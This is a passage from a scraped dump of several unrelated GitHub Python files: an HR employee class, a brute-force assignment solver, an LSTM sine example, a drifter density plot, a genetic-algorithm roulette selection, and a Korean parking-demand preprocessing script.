\"id\": 3,\n \"name\": \"HR\",\n \"empNumber\": 0,\n \"salaryRate\": {\n \"entry\": 1,\n \"jr\": 2,\n \"sr\": 3,\n \"leader\": 4,\n \"manager\": 5,\n }\n },\n {\n \"id\": 4,\n \"name\": \"Operations\",\n \"empNumber\": 0,\n \"salaryRate\": {\n \"entry\": 1,\n \"jr\": 2,\n \"sr\": 3,\n \"leader\": 4,\n \"manager\": 5,\n }\n },\n {\n \"id\": 5,\n \"name\": \"Executives\",\n \"empNumber\": 0,\n \"salaryRate\": {\n \"cob\": 1,\n \"ceo\": 2,\n \"coo\": 3,\n \"cfo\": 4,\n \"chro\": 5,\n \"cmo\": 6,\n \"cio\": 7,\n }\n }\n]\n\n# for i in range(0,len(hierarchy)):\n# if(i==0):\n# with open(\"data\\marketing.txt\",\"w\") as f:\n# f.write(json.dumps(hierarchy[0]))\n# elif(i==1):\n# with open(\"data\\it.txt\",\"w\") as f:\n# f.write(json.dumps(hierarchy[1]))\n# elif(i==2):\n# with open(\"data/finance.txt\",\"w\") as f:\n# f.write(json.dumps(hierarchy[2]))\n# elif(i==3):\n# with open(\"data\\hr.txt\",\"w\") as f:\n# f.write(json.dumps(hierarchy[3]))\n# if(i==4):\n# with open(\"data\\operations.txt\",\"w\") as f:\n# f.write(json.dumps(hierarchy[4]))\n# if(i==5):\n# with open(\"data\\executives.txt\",\"w\") as f:\n# f.write(json.dumps(hierarchy[5]))\n\n\nclass Employee:\n def __init__(self, id, name, dob, email, pos, salary, dep):\n 
self.id = id\n self.name = name\n self.dob = dob\n self.email = email\n self.pos = pos\n self.salary = salary\n self.dep = dep\n\n def find(lst, key, value):\n for i, dic in enumerate(lst):\n if dic[key] == value:\n return i\n return -1\n\n def setDob():\n dayFlag = True\n while(dayFlag):\n dayInput = int(input(\"Enter the student's day of birth: \"))\n if(isinstance(int(dayInput), int)):\n if(int(dayInput) < 32 and int(dayInput) > 0):\n dayFlag = False\n else:\n print(\"Entred day was invalid. Please try again.\")\n else:\n print(\"Entred day was invalid. Please try again.\")\n monthFlag = True\n while(monthFlag):\n monthInput = int(input(\"Enter the student's month of birth: \"))\n if(isinstance(int(monthInput), int)):\n if(int(monthInput) == 2 and int(dayInput) > 29):\n print(\"Entered month was invalid. Please try again\")\n elif(int(monthInput) < 13 and int(monthInput) > 0):\n monthFlag = False\n else:\n print(\"Entered month was invalid. Please try again\")\n yearFlag = True\n while(yearFlag):\n yearInput = int(input(\"Enter student's year of birth: \"))\n if(isinstance((yearInput), int)):\n if(yearInput < 1900 or yearInput > int(datetime.datetime.now().strftime(\"%Y\"))-18):\n print(\"Enter year was invalid. Please try again.\")\n else:\n yearFlag = False\n returnedValue = str(dayInput)+\"/\"+str(monthInput)+\"/\"+str(yearInput)\n return returnedValue\n\n def getSalary(dep, pos):\n with open(\"data/depData/\"+dep.lower()+\".txt\", \"r\") as f:\n data = json.loads(f.read())\n return data[\"salaryRate\"][pos.lower()]\n\n def setNewDob(self):\n newDob = Employee.setDob()\n self.dob = newDob\n \n def initName(self):\n while True:\n firstName = input(\"Enter first name: \")\n if(firstName.isalpha()):\n break\n else:\n print(\"Invalid input. Please try again\")\n while True:\n lastName = input(\"Enter last name: \")\n if(firstName.isalpha()):\n break\n else:\n print(\"Invalid input. 
Please try again\")\n fullName = firstName + \" \" + lastName\n return fullName\n\n def setSalary(self):\n Employee.getSalary(self.dep, self.pos)\n\ns1 = \"\"\nprint(s1.isalpha())\n","repo_name":"ntquanghai/HrManagementSystem","sub_path":"domains/employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"22534360962","text":"from src.instance_parser import get_CGLSP_instance_cost_matrix\nimport numpy as np\nimport time\n\n\ndef brute_force_AP_solver(cost_matrix):\n\n start_time = time.time()\n\n print(\"Solving Assignment Problem using Brute Force \\n\")\n\n print(\"Cost Matrix: \\n\", cost_matrix, \"\\n\")\n\n # generate all feasible solutions\n feasible_sols = generate_feasible_solutions(cost_matrix)\n\n # find the min cost feasbile solution\n if feasible_sols:\n\n print(\"Finding feasible solution with min cost: \")\n\n min_cost = np.inf\n best_sol = []\n best_assignment_costs = []\n for i, sol in enumerate(feasible_sols):\n cost, assignment_costs = feasible_sol_cost(sol, cost_matrix)\n # print(f\"Feasible Solution {i+1}/{len(feasible_sols)}: \", sol, \"Assignment Costs: \", assignment_costs, \"Total Cost: \", cost)\n if cost < min_cost:\n min_cost = cost\n best_sol = sol\n best_assignment_costs = assignment_costs\n\n end_time = time.time()\n elapsed_time = end_time - start_time\n\n print(\"\\nBest Solution: \")\n\n print(f\"\\nTotal cost = {min_cost}\\n\")\n\n num_jobs = len(best_sol)\n for i in range(0, num_jobs):\n cur_job = i\n next_job = best_sol[i][1]\n print(\n f\"Job {cur_job} precedes job {next_job}.\"\n + f\" Cost = {best_assignment_costs[i]}\"\n )\n\n print(\"\\nSolve Time = \", format(elapsed_time, '.6f'), \"seconds\")\n\n else:\n print(\"No feasible solutions. 
Assignment is not possible.\")\n\n return best_sol, best_assignment_costs, min_cost\n\n\ndef generate_feasible_solutions(cost_matrix):\n\n print(\"Generating feasible solutions: \")\n\n cost_matrix = cost_matrix.tolist()\n\n n = len(cost_matrix)\n\n feasible_solutions = []\n\n partial_solutions = [{\"path\": [(0, i)], \"used_cols\": {i}, \"cur_row\": 0} for i in range(1, n)]\n while partial_solutions:\n # print(partial_solutions)\n\n curr_path_object = partial_solutions.pop(0)\n curr_path = curr_path_object[\"path\"]\n next_row = curr_path_object[\"cur_row\"] + 1\n\n used_cols = curr_path_object[\"used_cols\"]\n next_row_feasible_cols = {index for index, cost in enumerate(\n cost_matrix[next_row]) if cost != \"NA\" and index != next_row} - used_cols\n for col in next_row_feasible_cols:\n updated_path = curr_path.copy()\n updated_path.append((next_row, col))\n if len(updated_path) == n:\n feasible_solutions.append(updated_path)\n # print(\"feasible soloutions\", feasible_solutions)\n else:\n new_used_cols = used_cols.union({col})\n cur_row = next_row\n updated_path_object = {\"path\": updated_path, \"used_cols\": new_used_cols, \"cur_row\": cur_row}\n partial_solutions.append(updated_path_object)\n\n print(f\"There are {len(feasible_solutions)} feasible solutions \\n\")\n\n return feasible_solutions\n\n\ndef feasible_sol_cost(sol, cost_matrix):\n\n # cost matrix is a 2d numpy array, #TO DO - add Typing\n\n row_indices = [edge[0] for edge in sol]\n\n col_indices = [edge[1] for edge in sol]\n\n assignment_costs = cost_matrix[row_indices, col_indices]\n\n cost = assignment_costs.sum()\n\n return cost, assignment_costs.tolist()\n\n\nif __name__ == \"__main__\":\n\n # n=3\n\n # cost_matrix = np.array([[i*j for i in range(4)] for j in range(4)] )\n\n # # feasible_sols = generate_feasible_solutions(cost_matrix)\n\n # # first_sol = feasible_sols[0]\n\n # # print(\"Sol: \", first_sol)\n # # cost = feasible_sol_cost(first_sol, cost_matrix)\n # # print(\"Sol Cost\": cost)\n\n # best_sol, best_assignment_costs, min_cost = brute_force_AP_solver(cost_matrix)\n\n instance_file_path = r\"C:\\Users\\Shmuli\\Desktop\\Optimization\\CGLSP\\problem_instances\\CGLSP_instances\\data\\cgl_17.txt\"\n cost_matrix = get_CGLSP_instance_cost_matrix(instance_file_path)\n print(cost_matrix)\n\n best_sol, min_cost = brute_force_AP_solver(cost_matrix)\n\n print(\"Best Sol: \", best_sol, \"Min Cost: \", min_cost)\n","repo_name":"shmulib/CGLSP","sub_path":"src/MAP_other/MAP_brute_force_solver.py","file_name":"MAP_brute_force_solver.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"3201110208","text":"import torch\nimport numpy as np\n\nfrom reg.nn import LSTMRegressor\n\n\nif __name__ == '__main__':\n\n np.random.seed(1337)\n torch.manual_seed(1337)\n\n import matplotlib.pyplot as plt\n\n T, L, N = 20, 250, 25\n\n input_size = 1\n target_size = 1\n\n x = np.empty((N, L), 'int64')\n x[:] = np.array(range(L)) + np.random.randint(-4 * T, 4 * T, N).reshape(N, 1)\n data = np.sin(x / 1.0 / T).astype('float64')\n\n input = data[:, :-1].reshape(N, -1, input_size)\n target = data[:, 1:].reshape(N, -1, target_size)\n\n lstm = LSTMRegressor(input_size=input_size,\n target_size=target_size,\n hidden_size=24,\n nb_layers=2)\n\n lstm.fit(target, input, nb_epochs=100, preprocess=True)\n\n horizon, buffer = 200, 35\n yhat = lstm.forcast(input[:, :buffer, :], horizon=horizon)\n\n plt.figure()\n plt.plot(target[5, buffer:buffer + horizon 
+ 1, :], label='target')\n plt.plot(yhat[5, ...], label='prediction')\n plt.legend()\n plt.show()\n","repo_name":"pnickl/reg","sub_path":"examples/lstm/lstm_sine.py","file_name":"lstm_sine.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12656861099","text":"import load_data\nimport matplotlib.pyplot as plt\nimport toolbox as tb\nimport pandas as pd\nimport numpy as np\nfrom file_names import *\nimport plotter\nimport cartopy.crs as ccrs\ncrs = ccrs.PlateCarree()\n\nds = load_data.load_subset(type_death=1)\nds_gps = load_data.load_subset(location_type='gps', ds=ds)\ndf = pd.read_csv(f'data/{file_name_1}.csv', parse_dates=['time_start', 'time_end'])\n\n#%%\nprint(f'Number of trajectories with death type 1: {len(ds.ids)}')\nprint(f'Number of trajectories with death type 1 and gps: {len(ds_gps.ids)}')\n\nylim= [-88, 88]\nxlim=None\nlonlat_box_size = 5\n\n\nX, Y, density_grid_original = tb.get_density_grid(ds.end_lat.values, ds.end_lon.values, ylim=ylim, xlim=xlim, latlon_box_size=lonlat_box_size)\ndensity_grid_gps = tb.get_density_grid(ds_gps.end_lat.values, ds_gps.end_lon.values, ylim=ylim, xlim=xlim, latlon_box_size=lonlat_box_size)[2]\ndensity_grid_own = tb.get_density_grid(df.latitude_end.values, df.longitude_end.values, ylim=ylim, xlim=xlim, latlon_box_size=lonlat_box_size)[2]\n\n\n# %%\nfig, axs = plt.subplots(3, 1, figsize=(14, 9), dpi=300)\nfor ax in axs.flat:\n # Plot your density map\n\n # Remove the extra borders\n ax.spines['top'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n\n\nplotter.plot_global_density(X, Y, density_grid_original, title='death type 1', ax=fig.add_subplot(3,1,1, projection=crs))\nplotter.plot_global_density(X, Y, density_grid_gps, title='death type 1 gps', ax=fig.add_subplot(3,1,2, projection=crs))\nplotter.plot_global_density(X, Y, density_grid_own, title='SDDA', ax=fig.add_subplot(3,1,3, projection=crs))\n\nplt.savefig(f'figures/compare_end_coords_{lonlat_box_size}.png')\n\nplt.show()","repo_name":"mfmopdenkamp/PlasticBeaching","sub_path":"compare_end_coords.py","file_name":"compare_end_coords.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"24381866319","text":"from typing import Callable\n\nimport numpy as np\nfrom sklearn.preprocessing import normalize\n\n\ndef roulette_selection(\n population: np.array, objective: Callable[[np.array], float]\n) -> np.array:\n \"\"\"\n Select mating pool using Roulette selection\n\n :param population: array of individual specimen\n :param objective: objective function, must take in array and return fitness value\n\n :return: array of selected mating pairs with shape (POPULATION_SIZE, SPECIMEN_DIM, 2)\n \"\"\"\n fitness = np.apply_along_axis(objective, 1, population)\n probabilities = np.cumsum(normalize(fitness.reshape(1, -1), norm=\"l1\"))\n\n selected = np.vectorize(lambda value: len(np.where(value > probabilities)[0]))(np.random.rand(len(population) * 2))\n return population[selected].reshape(population.shape + (2, 
))\n","repo_name":"kzajac97/evolutionary-algorithms","sub_path":"src/operators/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"44086646171","text":"# -*- coding: utf-8 -*-\n\n# ======================================================================================================================\n#\n#\n#\n# 1. Preprocessing 1\n#\n#\n#\n# ======================================================================================================================\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 0. Set Environments\n# ----------------------------------------------------------------------------------------------------------------------\n\n# --------------------------------------->>> [Import modules]\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport seaborn as sns\nimport pickle\n\nfrom sklearn.model_selection import KFold\nfrom sklearn.decomposition import NMF\n\n\n\n# --------------------------------------->>> [Set directory]\n\n\n# ----- Set output path\n\nout_path = 'data'\n\n# --------------------------------------->>> [Set options]\n\n# ----- Pandas max column showing options\n\npd.set_option('max.column', None)\n\n# ----- Matplotlib axis offset 설정\n\nmpl.rcParams['axes.formatter.useoffset'] = False\n\n# ----- 한글 폰트 설정\n\nplt.rcParams['font.family'] = 'AppleGothic'\nplt.rcParams['axes.unicode_minus'] = False\n\n\n\n# --------------------------------------->>> [Data loading]\n\n# ----- 데이터 로딩\n\nraw_train_df = pd.read_csv('data/235745_parking_data/train.csv')\nraw_test_df = pd.read_csv('data/235745_parking_data/test.csv')\nraw_age_gender_info = pd.read_csv('data/235745_parking_data/age_gender_info.csv')\nsample_submission = pd.read_csv('data/235745_parking_data/sample_submission.csv')\n\nraw_train_df.rename({'도보 10분거리 내 지하철역 수(환승노선 수 반영)' : 'subway',\n '도보 10분거리 내 버스정류장 수' : 'bus'}, axis = 1, inplace= True)\n\nraw_test_df.rename({'도보 10분거리 내 지하철역 수(환승노선 수 반영)' : 'subway',\n '도보 10분거리 내 버스정류장 수' : 'bus'}, axis = 1, inplace = True)\n\n# ----- 데이터 사전 전처리\n\ndelete_code_train = ['C1095',\n 'C2051',\n 'C1218',\n 'C1894',\n 'C2483',\n 'C1502',\n 'C1988',\n 'C2085',\n 'C1397',\n 'C2431',\n 'C1649',\n 'C1036']\n\ndelete_code_test = ['C2335',\n 'C1327',\n 'C2675']\n\nraw_train_df = raw_train_df.loc[~raw_train_df['단지코드'].isin(delete_code_train), :]\nraw_test_df = raw_test_df.loc[~raw_test_df['단지코드'].isin(delete_code_test), :]\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 1. 
단지별 요약 통계량 만들기\n# ----------------------------------------------------------------------------------------------------------------------\n\n# --------------------------------------->>> [이상값 처리]\n\n# ----- \"-\" NAN 처리\n\nraw_train_df = raw_train_df.replace({'-' : np.nan})\nraw_train_df['임대보증금'] = raw_train_df['임대보증금'].astype(float)\nraw_train_df['임대료'] = raw_train_df['임대료'].astype(float)\n\nraw_test_df = raw_test_df.replace({'-' : np.nan})\nraw_test_df['임대보증금'] = raw_test_df['임대보증금'].astype(float)\nraw_test_df['임대료'] = raw_test_df['임대료'].astype(float)\n\n# ----- 전용면적 15 미만 15로, 100초과 100으로\n\ndef tmp_fn(x):\n\n if x < 15:\n\n return 15\n\n if x >= 15 and x < 105:\n\n return x\n\n if x >= 105:\n\n return 100\n\nraw_train_df['전용면적'] = raw_train_df['전용면적'].map(tmp_fn)\nraw_test_df['전용면적'] = raw_test_df['전용면적'].map(tmp_fn)\n\n\n# --------------------------------------->>> [요약 통계량 만들기, train set]\n\n\ncode_list_uq = raw_train_df['단지코드'].unique().tolist()\n\nneed_columns = ['단지코드', '총세대수', '임대건물구분', '지역', '공급유형'] +\\\n [f'면적_{x}_세대수' for x in np.arange(15, 105, 5)] +\\\n ['공가수', '자격유형', 'subway', 'bus', '단지내주차면수', '등록차량수']\n\nbase_frame = pd.DataFrame({},\n columns = need_columns,\n index = [0])\n\ntrain_df_list = []\n\nfor code in code_list_uq:\n\n sub_df = raw_train_df.loc[raw_train_df['단지코드'] == code, :].copy()\n sub_df['전용면적'] = (sub_df['전용면적'] // 5) * 5\n\n sum_df = base_frame.copy()\n\n sum_df['단지코드'] = sub_df['단지코드'].unique()[0]\n sum_df['총세대수'] = sub_df['총세대수'].unique()[0]\n sum_df['임대건물구분'] = '+'.join(np.sort(sub_df['임대건물구분'].unique()).tolist())\n sum_df['지역'] = sub_df['지역'].unique()[0]\n sum_df['공급유형'] = '+'.join(np.sort(sub_df['공급유형'].unique()).tolist())\n sum_df['세대수합'] = sub_df['전용면적별세대수'].sum()\n sum_df['subway'] = sub_df['subway'].unique()[0]\n sum_df['bus'] = sub_df['bus'].unique()[0]\n sum_df['단지내주차면수'] = sub_df['단지내주차면수'].unique()[0]\n sum_df['등록차량수'] = sub_df['등록차량수'].unique()[0]\n sum_df['공가수'] = sub_df['공가수'].unique()[0]\n sum_df['자격유형'] = '+'.join(np.sort(sub_df['자격유형'].unique()).tolist())\n\n for ii in np.arange(15, 105, 5):\n\n if ii in sub_df['전용면적'].values:\n\n sum_df[f'면적_{ii}_세대수'] = sub_df.loc[sub_df['전용면적'] == ii, '전용면적별세대수'].sum()\n\n else:\n\n sum_df[f'면적_{ii}_세대수'] = 0\n\n sum_df['임대보증금_mean'] = sub_df['임대보증금'].mean()\n sum_df['임대보증금_min'] = sub_df['임대보증금'].min()\n sum_df['임대보증금_max'] = sub_df['임대보증금'].max()\n\n sum_df['임대료_mean'] = sub_df['임대료'].mean()\n sum_df['임대료_min'] = sub_df['임대료'].min()\n sum_df['임대료_max'] = sub_df['임대료'].max()\n\n train_df_list.append(sum_df)\n\ntrain_df = pd.concat(train_df_list)\n\ntrain_df.reset_index(drop = True, inplace = True)\n\n# --------------------------------------->>> [요약 통계량 만들기, test set]\n\n\ncode_list_uq = raw_test_df['단지코드'].unique().tolist()\n\nneed_columns = ['단지코드', '총세대수', '임대건물구분', '지역', '공급유형'] +\\\n [f'면적_{x}_세대수' for x in np.arange(15, 105, 5)] +\\\n ['공가수', '자격유형', 'subway', 'bus', '단지내주차면수']\n\nbase_frame = pd.DataFrame({},\n columns = need_columns,\n index = [0])\n\ntest_df_list = []\n\nfor code in code_list_uq:\n\n sub_df = raw_test_df.loc[raw_test_df['단지코드'] == code, :].copy()\n sub_df['전용면적'] = (sub_df['전용면적'] // 5) * 5\n\n sum_df = base_frame.copy()\n\n sum_df['단지코드'] = sub_df['단지코드'].unique()[0]\n sum_df['총세대수'] = sub_df['총세대수'].unique()[0]\n sum_df['임대건물구분'] = '+'.join(np.sort(sub_df['임대건물구분'].unique()).tolist())\n sum_df['지역'] = sub_df['지역'].unique()[0]\n sum_df['공급유형'] = '+'.join(np.sort(sub_df['공급유형'].unique()).tolist())\n sum_df['세대수합'] = sub_df['전용면적별세대수'].sum()\n sum_df['subway'] = 
sub_df['subway'].unique()[0]\n sum_df['bus'] = sub_df['bus'].unique()[0]\n sum_df['단지내주차면수'] = sub_df['단지내주차면수'].unique()[0]\n sum_df['공가수'] = sub_df['공가수'].unique()[0]\n sum_df['자격유형'] = '+'.join(np.sort(sub_df['자격유형'].dropna().unique()).tolist())\n\n for ii in np.arange(15, 105, 5):\n\n if ii in sub_df['전용면적'].values:\n\n sum_df[f'면적_{ii}_세대수'] = sub_df.loc[sub_df['전용면적'] == ii, '전용면적별세대수'].sum()\n\n else:\n\n sum_df[f'면적_{ii}_세대수'] = 0\n\n sum_df['임대보증금_mean'] = sub_df['임대보증금'].mean()\n sum_df['임대보증금_min'] = sub_df['임대보증금'].min()\n sum_df['임대보증금_max'] = sub_df['임대보증금'].max()\n\n sum_df['임대료_mean'] = sub_df['임대료'].mean()\n sum_df['임대료_min'] = sub_df['임대료'].min()\n sum_df['임대료_max'] = sub_df['임대료'].max()\n\n test_df_list.append(sum_df)\n\ntest_df = pd.concat(test_df_list)\n\ntest_df.reset_index(drop = True, inplace = True)\n\n# --------------------------------------->>> [공급유형 범주 합치기]\n\nin_test_cate = test_df['공급유형'].unique().tolist()\n\ntrain_df = train_df.loc[train_df['공급유형'].isin(in_test_cate), :]\n\ntrain_df['공급유형_merge'] = train_df['공급유형'].map({'공공임대(50년)' : '기타',\n '공공임대(10년)+공공임대(분납)' : '기타',\n '국민임대+영구임대+행복주택' : '기타',\n '영구임대' : '기타',\n '국민임대' : '국민임대',\n '공공임대(10년)' : '공공임대(10년)',\n '영구임대+임대상가' : '영구임대+임대상가',\n '행복주택' : '행복주택',\n '국민임대+영구임대' : '국민임대+영구임대'})\n\ntest_df['공급유형_merge'] = test_df['공급유형'].map({'공공임대(50년)' : '기타',\n '공공임대(10년)+공공임대(분납)' : '기타',\n '국민임대+영구임대+행복주택' : '기타',\n '영구임대' : '기타',\n '국민임대' : '국민임대',\n '공공임대(10년)' : '공공임대(10년)',\n '영구임대+임대상가' : '영구임대+임대상가',\n '행복주택' : '행복주택',\n '국민임대+영구임대' : '국민임대+영구임대'})\n\n# --------------------------------------->>> [자격유형 범주 합치기]\n\n# ----- Train set\n\nselected_items_list = ['A', 'C+D', 'H', 'J', 'A+E']\n\ntf_result = np.array([False]*train_df.shape[0])\n\nfor item in selected_items_list:\n\n tf_list = train_df['자격유형'].values == item\n\n tf_result = tf_result | tf_list\n\n\ntrain_df['자격유형_merge'] = [train_df['자격유형'].values[ii] if tf_result[ii] else '기타' for ii in range(train_df.shape[0])]\n\n# ----- Test set\n\nselected_items_list = ['A', 'C+D', 'H', 'J', 'A+E']\n\ntf_result = np.array([False]*test_df.shape[0])\n\nfor item in selected_items_list:\n\n tf_list = test_df['자격유형'].values == item\n\n tf_result = tf_result | tf_list\n\n\ntest_df['자격유형_merge'] = [test_df['자격유형'].values[ii] if tf_result[ii] else '기타' for ii in range(test_df.shape[0])]\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 2. 
Categorical 변수 전처리\n# ----------------------------------------------------------------------------------------------------------------------\n\n# --------------------------------------->>> [train / test set 지역 맞추기]\n\ntrain_df = train_df.loc[~train_df['지역'].isin(['서울특별시']), :]\ntrain_df.reset_index(drop = True, inplace = True)\n\n# --------------------------------------->>> [지역 mean encoding]\n\n# ----- Train set\n\nmean_enc_list = []\n\nfor tr_idx, ts_idx in KFold(n_splits = 5, shuffle = True, random_state = 0).split(train_df):\n\n tr_df = train_df.iloc[tr_idx, :].copy()\n ts_df = train_df.iloc[ts_idx, :].copy()\n\n ts_df['mean_enc_region'] = ts_df['지역'].map(tr_df.groupby('지역')['등록차량수'].mean())\n\n mean_enc_list.append(ts_df)\n\ntrain_df = pd.concat(mean_enc_list)\n\nglobal_mean = train_df['등록차량수'].mean()\ntrain_df['mean_enc_region'].fillna(global_mean, inplace = True)\n\n# ----- Test set\n\ntest_df['mean_enc_region'] = test_df['지역'].map(train_df.groupby('지역')['등록차량수'].mean())\n\n\n# --------------------------------------->>> [공급유형 mean encoding]\n\n# ----- Train set\n\nmean_enc_list = []\n\nfor tr_idx, ts_idx in KFold(n_splits = 5, shuffle = True, random_state = 0).split(train_df):\n\n tr_df = train_df.iloc[tr_idx, :].copy()\n ts_df = train_df.iloc[ts_idx, :].copy()\n\n ts_df['mean_enc_supply'] = ts_df['공급유형_merge'].map(tr_df.groupby('공급유형_merge')['등록차량수'].mean())\n\n mean_enc_list.append(ts_df)\n\ntrain_df = pd.concat(mean_enc_list)\n\nglobal_mean = train_df['등록차량수'].mean()\ntrain_df['mean_enc_supply'].fillna(global_mean, inplace = True)\n\n# ----- Test set\n\ntest_df['mean_enc_supply'] = test_df['공급유형_merge'].map(train_df.groupby('공급유형_merge')['등록차량수'].mean())\n\n# --------------------------------------->>> [자격유형 mean encoding]\n\n# ----- Train set\n\nmean_enc_list = []\n\nfor tr_idx, ts_idx in KFold(n_splits = 5, shuffle = True, random_state = 0).split(train_df):\n\n tr_df = train_df.iloc[tr_idx, :].copy()\n ts_df = train_df.iloc[ts_idx, :].copy()\n\n ts_df['mean_enc_cond'] = ts_df['자격유형_merge'].map(tr_df.groupby('자격유형_merge')['등록차량수'].mean())\n\n mean_enc_list.append(ts_df)\n\ntrain_df = pd.concat(mean_enc_list)\n\nglobal_mean = train_df['등록차량수'].mean()\ntrain_df['mean_enc_cond'].fillna(global_mean, inplace = True)\n\n# ----- Test set\n\ntest_df['mean_enc_cond'] = test_df['자격유형_merge'].map(train_df.groupby('자격유형_merge')['등록차량수'].mean())\n\n\n\n\ntrain_df.reset_index(drop = True, inplace = True)\ntest_df.reset_index(drop = True, inplace = True)\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 3. 
면적 관련 변수 전처리\n# ----------------------------------------------------------------------------------------------------------------------\n\n# --------------------------------------->>> [NMF로 latent feature extraction]\n\nsize_df_tr = train_df[[x for x in train_df.columns if '면적_' in x]]\nsize_df_ts = test_df[[x for x in test_df.columns if '면적_' in x]]\nsize_df_total = pd.concat([size_df_tr, size_df_ts])\n\nsize_arr_total = size_df_total.values\n\nnmf = NMF(n_components = 50,\n init = 'random',\n random_state = 0,\n max_iter = 300)\n\nW = nmf.fit_transform(size_arr_total)\n\nW_tr = W[0:size_df_tr.shape[0], :]\nW_ts = W[size_df_tr.shape[0]:, :]\n\nsize_df_train = pd.DataFrame(W_tr,\n columns = [f'size_{x}' for x in range(W_tr.shape[1])])\n\nsize_df_test = pd.DataFrame(W_ts,\n columns = [f'size_{x}' for x in range(W_ts.shape[1])])\n\n\ntrain_df = pd.concat([train_df, size_df_train], axis = 1)\ntest_df = pd.concat([test_df, size_df_test], axis = 1)\n\ntrain_df.reset_index(drop = True, inplace = True)\ntest_df.reset_index(drop = True, inplace = True)\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 4. 지역 관련 feature feature extraction\n# ----------------------------------------------------------------------------------------------------------------------\n\n# train_df_onehot = pd.get_dummies(train_df['지역'],\n# prefix = '지역')\n#\n# test_df_onehot = pd.get_dummies(test_df['지역'],\n# prefix = '지역')\n#\n# total_df_onehot = pd.concat([train_df_onehot, test_df_onehot])\n# total_df_onehot.reset_index(drop = True, inplace = True)\n#\n#\n# nmf = NMF(n_components = 50,\n# init = 'random',\n# random_state = 0,\n# max_iter = 300)\n#\n# W = nmf.fit_transform(total_df_onehot.values)\n#\n# W_tr = W[0:train_df_onehot.shape[0], :]\n# W_ts = W[train_df_onehot.shape[0]:, :]\n#\n# region_df_train = pd.DataFrame(W_tr,\n# columns = [f'region_{x}' for x in range(W_tr.shape[1])])\n#\n# region_df_test = pd.DataFrame(W_ts,\n# columns = [f'region_{x}' for x in range(W_ts.shape[1])])\n#\n# train_df = pd.concat([train_df, region_df_train], axis = 1)\n# test_df = pd.concat([test_df, region_df_test], axis = 1)\n#\n# train_df.reset_index(drop = True, inplace = True)\n# test_df.reset_index(drop = True, inplace = True)\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 4. 
결측치 처리\n# ----------------------------------------------------------------------------------------------------------------------\n\n# --------------------------------------->>> [Subway]\n\ntrain_df['subway'] = train_df['subway'].fillna(0)\ntest_df['subway'] = test_df['subway'].fillna(0)\n\n# --------------------------------------->>> [Bus]\n\nglobal_median = np.nanmedian(np.r_[train_df['bus'].values, test_df['bus'].values])\n\ntrain_df['bus'] = train_df['bus'].fillna(global_median)\n\n# --------------------------------------->>> [임대보증금_mean]\n\nglobal_mean = np.nanmean(np.r_[train_df['임대보��금_mean'].values, test_df['임대보증금_mean'].values])\n\ntrain_df['임대보증금_mean'] = train_df['임대보증금_mean'].fillna(global_mean)\ntest_df['임대보증금_mean'] = test_df['임대보증금_mean'].fillna(global_mean)\n\n# --------------------------------------->>> [임대보증금_min]\n\nglobal_mean = np.nanmean(np.r_[train_df['임대보증금_min'].values, test_df['임대보증금_min'].values])\n\ntrain_df['임대보증금_min'] = train_df['임대보증금_min'].fillna(global_mean)\ntest_df['임대보증금_min'] = test_df['임대보증금_min'].fillna(global_mean)\n\n# --------------------------------------->>> [임대보증금_max]\n\nglobal_mean = np.nanmean(np.r_[train_df['임대보증금_max'].values, test_df['임대보증금_max'].values])\n\ntrain_df['임대보증금_max'] = train_df['임대보증금_max'].fillna(global_mean)\ntest_df['임대보증금_max'] = test_df['임대보증금_max'].fillna(global_mean)\n\n# --------------------------------------->>> [임대료_mean]\n\nglobal_mean = np.nanmean(np.r_[train_df['임대료_mean'].values, test_df['임대료_mean'].values])\n\ntrain_df['임대료_mean'] = train_df['임대료_mean'].fillna(global_mean)\ntest_df['임대료_mean'] = test_df['임대료_mean'].fillna(global_mean)\n\n# --------------------------------------->>> [임대료_min]\n\nglobal_mean = np.nanmean(np.r_[train_df['임대료_min'].values, test_df['임대료_min'].values])\n\ntrain_df['임대료_min'] = train_df['임대료_min'].fillna(global_mean)\ntest_df['임대료_min'] = test_df['임대료_min'].fillna(global_mean)\n\n# --------------------------------------->>> [임대료_max]\n\nglobal_mean = np.nanmean(np.r_[train_df['임대료_max'].values, test_df['임대료_max'].values])\n\ntrain_df['임대료_max'] = train_df['임대료_max'].fillna(global_mean)\ntest_df['임대료_max'] = test_df['임대료_max'].fillna(global_mean)\n\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 5. 
